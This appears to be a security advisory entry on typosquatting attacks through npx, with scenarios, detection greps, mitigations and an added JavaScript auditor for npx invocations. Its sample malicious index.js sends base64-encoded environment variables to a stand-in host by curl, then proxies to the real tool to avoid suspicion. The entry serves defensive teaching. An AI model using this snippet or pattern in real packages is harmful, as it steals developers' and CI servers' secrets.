npx Remote Execution

npm | Code Execution | high | Linux, macOS, Windows
npx is a convenience tool that downloads and immediately executes packages from the npm registry without requiring an explicit install step. This makes typosquatting attacks especially dangerous, as a misspelled package name in an npx command results in arbitrary code execution with no prior review. Attackers register typosquat variants of popular CLI tools and wait for developers or CI/CD scripts to accidentally invoke them via npx.

Prerequisites

  • Target must use npx to run packages by name
  • Attacker must register a typosquat or similarly-named package on the npm registry

Attack Scenarios

Typosquatting a Popular CLI Tool via npx

An attacker registers packages with common misspellings of popular npx targets such as 'create-raect-app' or 'creat-react-app'. When a developer mistypes the npx command, the malicious package is downloaded and executed immediately, running attacker-controlled code.

Victim mistypes a popular npx command
npx create-raect-app my-project
# Downloads and executes the typosquat package immediately

Malicious typosquat package.json with bin entry
{
  "name": "create-raect-app",
  "version": "1.0.0",
  "bin": {
    "create-raect-app": "./index.js"
  }
}

Malicious index.js executed by npx
#!/usr/bin/env node
const { execSync } = require('child_process');
execSync('curl https://evil.example.com/collect?env=' +
  Buffer.from(JSON.stringify(process.env)).toString('base64'));
// Then proxy to the real tool to avoid suspicion
execSync('npx create-react-app ' + process.argv.slice(2).join(' '),
  { stdio: 'inherit' });

Exploiting npx Auto-Install in CI/CD Pipelines

CI/CD scripts frequently use npx to run build tools without managing local installations. An attacker who can influence the package name (via a PR to a build script, or by registering a package that a build step references) can achieve code execution on the build server.

Vulnerable CI/CD script using npx with unverified package
# .github/workflows/build.yml
steps:
  - run: npx some-build-tool --config build.json
  # If 'some-build-tool' is unclaimed or typosquatted,
  # attacker code runs on the CI server

Detection

Audit npx Usage in Scripts and CI/CD

Search your codebase and CI/CD configurations for npx invocations. Verify that each referenced package is legitimate and owned by a trusted publisher.

grep -rn 'npx ' .github/ scripts/ Makefile package.json 2>/dev/null

Check for npx Auto-Install Prompts

In npm v7+, npx prompts before installing unknown packages. Ensure CI/CD environments do not use the --yes flag indiscriminately, which bypasses this safety prompt.

grep -rnE 'npx (--yes|-y)' .github/ scripts/ 2>/dev/null

Mitigation

  • Prefer installing CLI tools explicitly with npm install before invoking them, rather than relying on npx auto-download
  • Never use npx --yes in CI/CD scripts without verifying the exact package name and publisher
  • Use npx with fully qualified versioned package names (e.g., npx create-react-app@5.0.1) to reduce typosquatting risk
  • Audit all npx invocations in CI/CD pipelines and developer onboarding documentation for accuracy
  • Consider using Corepack or Volta for managing CLI tool versions instead of relying on npx
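
The grep checks under Detection and the version-pinning advice above can be combined into one static audit that also flags names close to a known-good package. This is an added example, not part of the original page or of npm; the allowlist contents, the edit-distance threshold of 2 and the function names are assumptions.

```javascript
// Added example, not from the original page. KNOWN_GOOD is an assumed,
// team-maintained allowlist; only the plain `npx [flags] <pkg>` form is parsed.
const KNOWN_GOOD = ['create-react-app', 'eslint', 'prettier'];

// Levenshtein edit distance, single-row dynamic programming.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const up = row[j];
      row[j] = Math.min(up + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = up;
    }
  }
  return row[b.length];
}

// Return one finding per risky npx invocation found in `text`.
function auditNpx(text, allow = KNOWN_GOOD) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    const m = /^\s*#/.test(line) ? null : /\bnpx\s+(.+)/.exec(line);
    if (!m) return;
    const tokens = m[1].trim().split(/\s+/);
    const k = tokens.findIndex((t) => !t.startsWith('-')); // first non-flag = package spec
    const clean = k < 0 ? '' : tokens[k].replace(/^['"`(]+|['"`;,)]+$/g, '');
    if (!clean) return;
    const issues = tokens.slice(0, k).some((f) => f === '-y' || f === '--yes') ? ['prompt bypassed'] : [];
    const [, name, version = ''] = /^(@?[^@]+)(?:@(.+))?$/.exec(clean) || [null, clean];
    if (!/^\d+\.\d+\.\d+([-+][\w.-]+)?$/.test(version)) issues.push('version not pinned');
    if (!allow.includes(name)) {
      const near = allow.find((good) => editDistance(name, good) <= 2);
      issues.push(near ? `possible typosquat of ${near}` : 'not on allowlist');
    }
    if (issues.length) findings.push({ line: i + 1, name, issues });
  });
  return findings;
}

const SAMPLE = [ // constructed sample input, built from the commands shown on this page
  'npx create-raect-app my-project',
  '  - run: npx some-build-tool --config build.json',
  '  - run: npx --yes create-react-app@5.0.1 my-app',
  '  - run: npx create-react-app@5.0.1 my-app',
].join('\n');
console.log(JSON.stringify(auditNpx(SAMPLE), null, 2));
```

Run it over the contents of workflow files, Makefiles and package.json scripts; a pinned, allowlisted invocation without --yes produces no finding.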
